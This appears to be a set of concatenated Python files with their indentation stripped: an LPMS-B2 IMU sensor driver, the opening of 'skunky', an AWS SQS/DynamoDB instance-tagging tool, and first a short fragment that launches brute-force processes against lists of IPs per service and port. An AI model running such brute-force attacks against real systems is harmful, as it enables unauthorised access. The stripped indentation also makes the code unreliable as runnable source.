iplist = services[service][port]
f = open(fname, 'w+')
for ip in iplist:
f.write(ip + '\n')
f.close()
brute_process = Process(target=brute, args=(service,port,fname,args.output))
brute_process.start()
#need to wait for all of the processes to run...
#shutil.rmtree(tmppath, ignore_errors=False, onerror=None)
|
LpmsB2.py
|
import time
import serial
import threading
import struct
import sys
from datetime import datetime, timedelta
from LpmsConfig import *
from lputils import *
from LpmsConfigurationSettings import LpmsConfigurationSettings
#TODO:
# check serial port opened before executing commands
# add wait for ack routine
class LpmsB2(object):
TAG = "LPMSB2"
runOnce = True;
verbose = True
is_thread_running = False
sensor_configuration = LpmsConfigurationSettings()
PACKET_ADDRESS0 = 0
PACKET_ADDRESS1 = 1
PACKET_FUNCTION0 = 2
PACKET_FUNCTION1 = 3
PACKET_RAW_DATA = 4
PACKET_LRC_CHECK0 = 5
PACKET_LRC_CHECK1 = 6
PACKET_END = 7
PACKET_LENGTH0 = 8
PACKET_LENGTH1 = 9
current_length = 0
current_function = 0
current_address = 0
rx_state = PACKET_END
in_bytes = []
rx_buffer = []
raw_tx_data = []
rx_index = 0
lrc_check = 0
wait_for_ack = False
wait_for_data = False
is_sensor_connected = False
is_command_mode = False
config_register = 0
status_register = 0
imu_id = 0
timestamp = 0
frame_counter = 0
battery_level = 0
battery_voltage = 0
temperature = 0
acc_x = 0
acc_y = 0
acc_z = 0
gyr_x = 0
gyr_y = 0
gyr_z = 0
mag_x = 0
mag_y = 0
mag_z = 0
angular_vel_x = 0
angular_vel_y = 0
angular_vel_z = 0
quat_w = 0
quat_x = 0
quat_y = 0
quat_z = 0
euler_x = 0
euler_y = 0
euler_z = 0
linacc_x = 0
linacc_y = 0
linacc_z = 0
altitude = 0
pressure = 0
humidity = 0
# debug log
debug_log_size = 0
debug_log_size_index = 0
def __init__(self, port, baudrate):
self.port = port
self.baudrate = baudrate
self.__init_params()
def __clear_params(self):
self.current_length = 0
self.current_function = 0
self.current_address = 0
self.rx_state = self.PACKET_END
self.in_bytes = []
self.rx_buffer = []
self.raw_tx_data = []
self.rx_index = 0
self.lrc_check = 0
self.imu_id = 0
self.timestamp = 0
self.frame_counter = 0
self.battery_level = 0
self.battery_voltage = 0
self.temperature = 0
self.acc_x = 0
self.acc_y = 0
self.acc_z = 0
self.gyr_x = 0
self.gyr_y = 0
self.gyr_z = 0
self.mag_x = 0
self.mag_y = 0
self.mag_z = 0
self.angular_vel_x = 0
self.angular_vel_y = 0
self.angular_vel_z = 0
self.quat_w = 0
self.quat_x = 0
self.quat_y = 0
self.quat_z = 0
self.euler_x = 0
self.euler_y = 0
self.euler_z = 0
self.linacc_x = 0
self.linacc_y = 0
self.linacc_z = 0
self.altitude = 0
self.pressure = 0
self.humidity = 0
self.wait_for_ack = False
self.wait_for_data = False
def __init_params(self):
self.__clear_params()
def __thread_is_alive(self):
try:
return self.thread.isAlive()
except AttributeError:
return False
def __run(self):
""" Method that runs forever """
self.is_thread_running = True
while not self.quit:
self.is_sensor_connected = True
bytesToRead = self.serial_port.inWaiting()
if bytesToRead > 0:
reading = self.serial_port.read(bytesToRead)
#print reading
self.__parse(reading)
self.serial_port.close()
self.is_sensor_connected = False
self.is_thread_running = False
# TODO: add offset length check
def __convert_rxbytes_to_int16(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("h", ''.join(dataList[offset:offset+2]))
return i
def __convert_rxbytes_to_int(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("i", ''.join(dataList[offset:offset+4]))
return i
def __convert_rxbytes_to_float(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("f", ''.join(dataList[offset:offset+4]))
return i
def __convert_int16_to_txbytes(self, v):
"""
return bytesarray
"""
return struct.pack("h", v)
def __convert_int_to_txbytes(self, v):
"""
return bytesarray
"""
return struct.pack("i", v)
def __print_str_to_hex(self, s):
print ":".join("{:02x}".format(ord(c)) for c in s)
# Parser
def __parse_function(self):
cf = self.current_function
if cf == LPMS_ACK:
logd(self.TAG , "Received Ack")
self.wait_for_ack = False
elif cf == LPMS_NACK:
logd(self.TAG , "Received Nack")
self.wait_for_ack = False
elif cf == LPMS_GET_CONFIG:
self.config_register = self.__convert_rxbytes_to_int(0, self.rx_buffer)
print"{0:b}".format(self.config_register).zfill(32)
self.__parse_configuration_register(self.config_register)
self.wait_for_data = False
elif cf == LPMS_GET_SENSOR_DATA:
if self.sensor_configuration.sixteen_bit_data_enable:
self.__parse_sensor_data(16)
else:
self.__parse_sensor_data()
self.wait_for_data = False
elif cf == GET_BATTERY_LEVEL:
self.battery_level = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_CHARGING_STATUS:
self.chargingStatus = self.__convert_rxbytes_to_int(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_BATTERY_VOLTAGE:
self.battery_voltage = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_FIRMWARE_VERSION:
vmajor = self.__convert_rxbytes_to_int(8, self.rx_buffer)
vminor = self.__convert_rxbytes_to_int(4, self.rx_buffer)
vbuild = self.__convert_rxbytes_to_int(0, self.rx_buffer)
self.firmwareVersion = str(vmajor) + "." + str(vminor) + "." + str(vbuild)
self.wait_for_data = False
elif cf == GET_PING:
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = self.__convert_rxbytes_to_int(0, self.rx_buffer)
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
elif cf == GET_TEMPERATURE:
self.temperature = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_DEBUG_LOGGING_STATUS:
self.debugLoggingStatus = self.__convert_rxbytes_to_int(0, self.rx_buffer)
logd(self.TAG , "Debug Logging Status: "+str(self.debugLoggingStatus))
self.wait_for_data = False
elif cf == GET_DEBUG_LOG_SIZE:
self.debug_log_size = self.__convert_rxbytes_to_int(0, self.rx_buffer) / 32
logd(self.TAG , "Debug Logging Size: "+str(self.debug_log_size))
self.wait_for_data = False
elif cf == GET_DEBUG_LOG:
log = str(self.__convert_rxbytes_to_int(0, self.rx_buffer)) + ','
log += str(float(self.__convert_rxbytes_to_int16(4, self.rx_buffer))/100) + ','
log += str(float(self.__convert_rxbytes_to_int16(6, self.rx_buffer))/1000) + ','
log += str(self.__convert_rxbytes_to_float(8, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(12, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(16, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(20, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(24, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(28, self.rx_buffer))
if self.debug_log_size_index == 0:
filename = "DebugLog-"+datetime.now().strftime("%Y%m%d-%H%M%S")+".csv"
logd(self.TAG , "Saving to "+ filename)
self.fo = open(filename, "wb")
self.startTime = datetime.now()
self.fo.write(log+'\n')
self.debug_log_size_index += 1
self.__update_progress(self.debug_log_size_index)
if self.debug_log_size_index >= self.debug_log_size:
self.fo.close()
dt = (datetime.now()-self.startTime).total_seconds()
print
logd(self.TAG , "Debug log download completed")
print "Elapsed time:", str(dt)
def __update_progress(self, progress):
percent = int(progress*100/self.debug_log_size)
sys.stdout.write("\rDownloading: %d%%, %d, %d" % (percent, progress, self.debug_log_size))
sys.stdout.flush()
def __parse(self, data):
self.lrcReceived = 0
for b in data:
if self.rx_state == self.PACKET_END:
if (b == ':'):
self.rx_state = self.PACKET_ADDRESS0
elif self.rx_state == self.PACKET_ADDRESS0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_ADDRESS1
elif self.rx_state == self.PACKET_ADDRESS1:
self.in_bytes.append(b)
self.current_address = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.imu_id = self.current_address
self.rx_state = self.PACKET_FUNCTION0
elif self.rx_state == self.PACKET_FUNCTION0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_FUNCTION1
elif self.rx_state == self.PACKET_FUNCTION1:
self.in_bytes.append(b)
self.current_function = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.rx_state = self.PACKET_LENGTH0
elif self.rx_state == self.PACKET_LENGTH0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_LENGTH1
elif self.rx_state == self.PACKET_LENGTH1:
self.in_bytes.append(b)
self.current_length = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.rx_state = self.PACKET_RAW_DATA
self.rx_index = 0
self.rx_buffer = []
elif self.rx_state == self.PACKET_RAW_DATA:
if self.rx_index == self.current_length:
self.lrc_check = self.current_address + self.current_function + self.current_length
self.lrc_check = self.lrc_check + sum([ord(c) for c in self.rx_buffer])
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_LRC_CHECK1
else:
# add length check
self.rx_buffer.append(b)
self.rx_index = self.rx_index + 1
elif self.rx_state == self.PACKET_LRC_CHECK1:
self.in_bytes.append(b)
self.lrcReceived = self.__convert_rxbytes_to_int16(0, self.in_bytes)
if self.lrcReceived == self.lrc_check:
self.__parse_function()
self.rx_state = self.PACKET_END
else:
self.rx_state = self.PACKET_END
"""
def __parse_sensor_data(self):
o = 0
r2d = 57.2958
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
o += 4
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
self.gyr_y = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
self.gyr_z = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
if self.sensor_configuration.accelerometer_enable:
self.acc_x = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.acc_y = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.acc_z = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
if self.sensor_configuration.magnetometer_enable:
self.mag_x = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.mag_y = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.mag_z = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
if self.sensor_configuration.quaternion_enable:
self.quat_w = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.quat_x = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.quat_y = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.quat_z = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
if self.sensor_configuration.euler_enable:
self.euler_x = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
self.euler_y = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
self.euler_z = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.linacc_y = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.linacc_z = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
if self.sensor_configuration.pressure_enable:
self.pressure = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
"""
def __parse_sensor_data(self, data_mode=32):
o = 0
r2d = 57.2958
if data_mode == 16:
converter = lambda offset, l: float(self.__convert_rxbytes_to_int16(offset, l)) / 1000.0
increment = 2
else:
converter = lambda offset, l: self.__convert_rxbytes_to_float(offset, l)
increment = 4
# TODO: Add timestamp counter mode/elapsed mode
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
o += 4
if self.runOnce:
self.frame_counter = self.timestamp
self.runOnce = False
else:
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = converter(o, self.rx_buffer) * r2d
o += increment
self.gyr_y = converter(o, self.rx_buffer) * r2d
o += increment
self.gyr_z = converter(o, self.rx_buffer) * r2d
o += increment
if self.sensor_configuration.accelerometer_enable:
self.acc_x = converter(o, self.rx_buffer)
o += increment
self.acc_y = converter(o, self.rx_buffer)
o += increment
self.acc_z = converter(o, self.rx_buffer)
o += increment
if self.sensor_configuration.magnetometer_enable:
self.mag_x = converter(o, self.rx_buffer)
o += increment
self.mag_y = converter(o, self.rx_buffer)
o += increment
self.mag_z = converter(o, self.rx_buffer)
o += increment
# 100 Fixed point
if data_mode == 16:
self.mag_x *= 10
self.mag_y *= 10
self.mag_z *= 10
if self.sensor_configuration.angular_velocity_enable:
self.angular_vel_x = converter(o, self.rx_buffer) * r2d
o += increment
self.angular_vel_y = converter(o, self.rx_buffer) * r2d
o += increment
self.angular_vel_z = converter(o, self.rx_buffer) * r2d
o += increment
if self.sensor_configuration.quaternion_enable:
self.quat_w = converter(o, self.rx_buffer)
o += increment
self.quat_x = converter(o, self.rx_buffer)
o += increment
self.quat_y = converter(o, self.rx_buffer)
o += increment
self.quat_z = converter(o, self.rx_buffer)
o += increment
# 10000 Fixed point
if data_mode == 16:
self.quat_w /= 10
self.quat_x /= 10
self.quat_y /= 10
self.quat_z /= 10
if self.sensor_configuration.euler_enable:
self.euler_x = converter(o, self.rx_buffer) * r2d
o += increment
self.euler_y = converter(o, self.rx_buffer) * r2d
o += increment
self.euler_z = converter(o, self.rx_buffer) * r2d
o += increment
# 10000 Fixed point
if data_mode == 16:
                self.euler_x /= 10
                self.euler_y /= 10
                self.euler_z /= 10
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = converter(o, self.rx_buffer)
o += increment
self.linacc_y = converter(o, self.rx_buffer)
o += increment
self.linacc_z = converter(o, self.rx_buffer)
o += increment
if self.sensor_configuration.pressure_enable:
self.pressure = converter(o, self.rx_buffer)
o += increment
# 10 Fixed point
if data_mode == 16:
self.pressure *= 100
if self.sensor_configuration.altitude_enable:
self.altitude = converter(o, self.rx_buffer)
o += increment
# 10 Fixed point
if data_mode == 16:
self.altitude *= 100
if self.sensor_configuration.temperature_enable:
self.temperature = converter(o, self.rx_buffer)
o += increment
# 100 Fixed point
if data_mode == 16:
self.temperature *= 10
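    # Worked example for the 16-bit path above (illustrative): a raw quaternion
    # word of 9987 is first divided by 1000 by `converter` and then by 10 here,
    # i.e. 9987 -> 0.9987 (10000 fixed point); a magnetometer word of 1234 is
    # divided by 1000 and then multiplied by 10, i.e. 1234 -> 12.34 (100 fixed point).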
def __parse_sensor_data_16bit(self):
o = 0
r2d = 57.2958
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
o += 4
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
self.gyr_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
self.gyr_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
if self.sensor_configuration.accelerometer_enable:
self.acc_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.acc_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.acc_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
if self.sensor_configuration.magnetometer_enable:
self.mag_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
self.mag_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
self.mag_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
if self.sensor_configuration.quaternion_enable:
self.quat_w = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
if self.sensor_configuration.euler_enable:
self.euler_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
self.euler_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
self.euler_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.linacc_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.linacc_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
if self.sensor_configuration.pressure_enable:
self.pressure = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
# communication
def __get_config_register(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
if self.verbose: logd(self.TAG, "Get config register")
time.sleep(.1)
self.__lpbus_set_none(LPMS_GET_CONFIG)
self.wait_for_data = True
self.__wait_for_response()
def __send_data(self, function, length):
txlrc_check = 0
txBuffer = chr(0x3a)
txBuffer += self.__convert_int16_to_txbytes(self.imu_id)
txBuffer += self.__convert_int16_to_txbytes(function)
txBuffer += self.__convert_int16_to_txbytes(length)
if length > 0:
txBuffer += self.raw_tx_data
txlrc_check = self.imu_id + function + length
if length > 0:
txlrc_check += sum([ord(c) for c in self.raw_tx_data])
txBuffer += self.__convert_int16_to_txbytes(txlrc_check)
txBuffer += chr(0x0d)
txBuffer += chr(0x0a)
self.__print_str_to_hex(txBuffer)
bytesSent = self.serial_port.write(txBuffer)
def __lpbus_set_none(self, command):
self.__send_data(command, 0)
def __lpbus_set_int32(self, command, v):
self.raw_tx_data = self.__convert_int_to_txbytes(v)
self.__send_data(command, 4)
def __lpbus_set_data(self, command, length, dataBuffer):
self.raw_tx_data = dataBuffer
self.__send_data(command, length)
def __wait_for_response(self):
while self.wait_for_ack or self.wait_for_data:
time.sleep(.1)
def __parse_configuration_register(self, cr):
self.sensor_configuration.parse(cr)
# User command
def connect(self):
if self.__thread_is_alive():
loge(self.TAG, "Another connection established")
return False
try:
self.__clear_params()
self.thread = threading.Thread(target=self.__run, args=())
self.serial_port = serial.Serial(self.port, self.baudrate , timeout=None,xonxoff=False, rtscts=False, dsrdtr=False)
self.quit = False
logd(self.TAG , "Sensor connected")
#thread.daemon = True # Daemonize thread
self.thread.start() # Start the execution
time.sleep(1)
            self.set_command_mode()          # switch to command mode before configuration reads
            time.sleep(.2)
            self.__get_config_register()     # read and parse the configuration register
            time.sleep(.2)
            self.set_streaming_mode()        # resume streaming
return True
except serial.SerialException:
loge(self.TAG, "Could not open port " + self.port)
loge(self.TAG, "Please try again")
return False
def disconnect(self):
self.quit = True
if self.__thread_is_alive():
self.thread.join()
logd(self.TAG , "sensor disconnected")
return True
def is_connected(self):
return self.is_sensor_connected
# Configuration and Status
def get_config_register(self):
"""
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(LPMS_GET_CONFIG)
self.wait_for_data = True
self.__wait_for_response()
"""
return self.sensor_configuration
def get_status_register(self):
pass
# Mode switching
def set_command_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
if self.verbose: logd(self.TAG, "Set command mode")
self.__lpbus_set_none(LPMS_GOTO_COMMAND_MODE)
self.wait_for_ack = True
self.__wait_for_response()
self.is_command_mode = True
def set_streaming_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set streaming mode")
self.__lpbus_set_none(LPMS_GOTO_STREAM_MODE)
self.wait_for_ack = True
self.__wait_for_response()
self.is_command_mode = False
    # Data transmission
def get_sensor_data(self):
"""
get sensor data during command Mode
"""
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
if self.verbose: logd(self.TAG, "Get sensor data")
self.__lpbus_set_none(LPMS_GET_SENSOR_DATA)
self.wait_for_data = True
self.__wait_for_response()
return self.get_stream_data()
def get_stream_data(self):
"""
get sensor data during stream Mode
"""
data = []
data.append(self.imu_id)
data.append(self.timestamp)
data.append(self.frame_counter)
data.append(self.battery_level)
data.append(self.battery_voltage)
data.append(self.temperature)
data.append([self.acc_x, self.acc_y, self.acc_z])
data.append([self.gyr_x, self.gyr_y, self.gyr_z])
data.append([self.mag_x, self.mag_y, self.mag_z])
data.append([self.quat_w, self.quat_x, self.quat_y, self.quat_z])
data.append([self.euler_x, self.euler_y, self.euler_z])
data.append([self.linacc_x, self.linacc_y, self.linacc_z])
return data
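    # Usage sketch (illustrative, not part of the driver; port and baudrate are
    # assumptions for the example):
    #
    #     sensor = LpmsB2('/dev/ttyUSB0', 921600)
    #     if sensor.connect():
    #         imu_id, ts, frame, batt, volt, temp, acc, gyr, mag, quat, euler, linacc = sensor.get_stream_data()
    #         sensor.disconnect()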
def set_transmit_data(self):
pass
def set_baudrate(self, baud):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set baudrate: "+str(baud)+"bps")
self.__lpbus_set_int32(LPMS_SET_UART_BAUDRATE ,baud)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_stream_frequency(self, freq):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set stream freq: "+str(freq)+"Hz")
self.__lpbus_set_int32(LPMS_SET_STREAM_FREQ , freq)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_stream_frequency_5Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_5HZ)
def set_stream_frequency_10Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_10HZ)
def set_stream_frequency_25Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_25HZ)
def set_stream_frequency_50Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_50HZ)
def set_stream_frequency_100Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_100HZ)
def set_stream_frequency_200Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_200HZ)
def set_stream_frequency_400Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_400HZ)
def set_16bit_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set 16 bit data")
self.__lpbus_set_int32(LPMS_SET_LPBUS_DATA_MODE, LPMS_LPBUS_DATA_MODE_16)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_32bit_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set 32 bit data")
self.__lpbus_set_int32(LPMS_SET_LPBUS_DATA_MODE, LPMS_LPBUS_DATA_MODE_32)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
# Register value save and reset
def save_parameters(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Save parameters to sensor")
self.__lpbus_set_none(LPMS_WRITE_REGISTERS)
self.wait_for_ack = True
self.__wait_for_response()
self.set_streaming_mode()
def reset_factory(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Reset factory settings")
self.__lpbus_set_none(LPMS_RESET_FACTORY_VALUE)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
# Reference setting and offset reset
def reset_reference(self):
pass
def start_mag_calibration(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
self.set_command_mode()
if self.verbose: logd(self.TAG, "Start mag calibration")
self.__lpbus_set_none(LPMS_START_MAG_CALIBRATION)
self.wait_for_ack = True
self.__wait_for_response()
self.set_streaming_mode()
# Debug Log
def start_debug_logging(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(START_DEBUG_LOGGING)
self.wait_for_ack = True
self.__wait_for_response()
def stop_debug_logging(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(STOP_DEBUG_LOGGING)
self.wait_for_ack = True
self.__wait_for_response()
def clear_debug_log(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(CLEAR_DEBUG_LOG)
self.wait_for_ack = True
self.__wait_for_response()
def full_flash_erase(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(FULL_FLASH_ERASE)
self.wait_for_ack = True
self.__wait_for_response()
def get_debug_log_status(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(GET_DEBUG_LOGGING_STATUS)
self.wait_for_data = True
self.__wait_for_response()
return self.debugLoggingStatus
def get_debug_log_size(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(GET_DEBUG_LOG_SIZE)
self.wait_for_data = True
self.__wait_for_response()
return self.debug_log_size
def get_debug_log(self, indexStart, indexStop):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
if indexStop < 0:
loge(self.TAG, "Error index")
return
self.debug_log_size = indexStop - indexStart + 1
self.debug_log_size_index = 0
data = ""
data += self.__convert_int_to_txbytes(indexStart)
data += self.__convert_int_to_txbytes(indexStop)
self.__lpbus_set_data(GET_DEBUG_LOG, 8, data)
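    # Debug-log download sketch (illustrative): the calls above are meant to be
    # chained roughly as
    #
    #     size = sensor.get_debug_log_size()
    #     if size > 0:
    #         sensor.get_debug_log(0, size - 1)   # parser writes DebugLog-<timestamp>.csv
    #
    # with start_debug_logging()/stop_debug_logging() bracketing the recording.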
|
skunky.py
|
#!/usr/bin/env python
import hashlib
import json
import logging
import logging.config
import os
import sys
import time
from multiprocessing import Process
import boto3
from botocore.exceptions import ClientError
from decimal import Decimal
import import_string
from skunky.aws.lambdakickass import LambdaKickass
__version__ = '0.1.0'
LOGGER = None
logging.getLogger('boto3').setLevel(logging.CRITICAL)
logging.getLogger('botocore').setLevel(logging.CRITICAL)
Session = boto3.Session()
class Filter(object):
def __init__(self, config=None):
self.config = config
def apply(self, input_list):
raise NotImplementedError
class Auditor(object):
def __init__(self, config=None):
self.config = config
def audit(self, input_list):
raise NotImplementedError
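# Illustrative plugin sketch (hypothetical, not shipped with skunky): filters
# return a truthy value from apply() to *skip* skunking an identity, and
# auditors receive the same identity dict in audit().
class IgnoredAccountsFilter(Filter):
    def apply(self, identity):
        # "ignored_accounts" is an assumed filter_config key used only in this example
        ignored = (self.config or {}).get('ignored_accounts', [])
        return identity.get('instance_account_id') in ignored
class PrintAuditor(Auditor):
    def audit(self, identity):
        print("would audit instance {}".format(identity.get('instance_id')))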
class Skunky(object):
def __init__(self, session, config='config.json', ttl_time=2592000, time_run=285):
self.config = self._init_config(config)
self._init_logging()
self.session = session
self.region = self.config.get('region', 'us-west-2')
self.ttl_time = self.config.get('ttl_time', 2592000)
self.time_run = self.config.get('time_run', 285)
self.lk = LambdaKickass(session=self.session)
self.sqs_client = self.session.client('sqs', region_name=self.region)
self.dynamodb_resource = self.session.resource('dynamodb', region_name=self.region)
self.dynamodb_table_name = 'Skunky'
self.dynamodb_table = self.dynamodb_resource.Table(self.dynamodb_table_name)
self.queue_name = 'skunky'
self.queue_url = self.get_queue_url()
self.to_be_skunked = {}
self.time_start = Decimal(time.time())
self.expire = None
self.active_filters = self.config.get('ACTIVE_FILTERS', [])
self.active_auditors = self.config.get('ACTIVE_AUDITORS', [])
self.filter_plugins = []
self.auditor_plugins = []
def _init_logging(self):
global LOGGER
logging.config.dictConfig(self.config['logging'])
LOGGER = logging.getLogger(__name__)
def _init_config(self, config_file):
try:
with open(os.path.join(os.getcwd(), config_file), 'r') as f:
config = json.load(f)
return config
except IOError:
LOGGER.fatal("Unable to load config from {}!".format(config_file))
def _load_filters(self):
for filter_plugin in self.active_filters:
cls = None
try:
cls = import_string(filter_plugin)
except ImportError as e:
LOGGER.warn("Unable to find plugin {}, exception: {}".format(filter_plugin, e))
else:
plugin = None
try:
plugin = cls(config=self.config['filter_config'].get(cls.__name__))
except KeyError:
plugin = cls()
LOGGER.info('Loaded plugin {}'.format(filter_plugin))
self.filter_plugins.append(plugin)
def _load_auditors(self):
for auditor_plugin in self.active_auditors:
cls = None
try:
cls = import_string(auditor_plugin)
except ImportError as e:
LOGGER.warn("Unable to find plugin {}, exception: {}".format(auditor_plugin, e))
else:
plugin = None
try:
plugin = cls(config=self.config['auditor_config'].get(cls.__name__))
except KeyError:
plugin = cls()
LOGGER.info('Loaded plugin {}'.format(auditor_plugin))
self.auditor_plugins.append(plugin)
def run(self):
LOGGER.info("Skunky starting...")
self.expire = self.time_start + self.time_run
self._load_filters()
self._load_auditors()
self._start()
def _start(self, silent=False):
while True:
if self.expire and time.time() > self.expire:
LOGGER.warn("Skunky running out of time, starting fresh...")
return
self.receive_identities_from_queue()
self.skunk_instances()
time.sleep(1)
def get_queue_url(self):
response = self.sqs_client.get_queue_url(QueueName=self.queue_name)
return response['QueueUrl']
def receive_identities_from_queue(self):
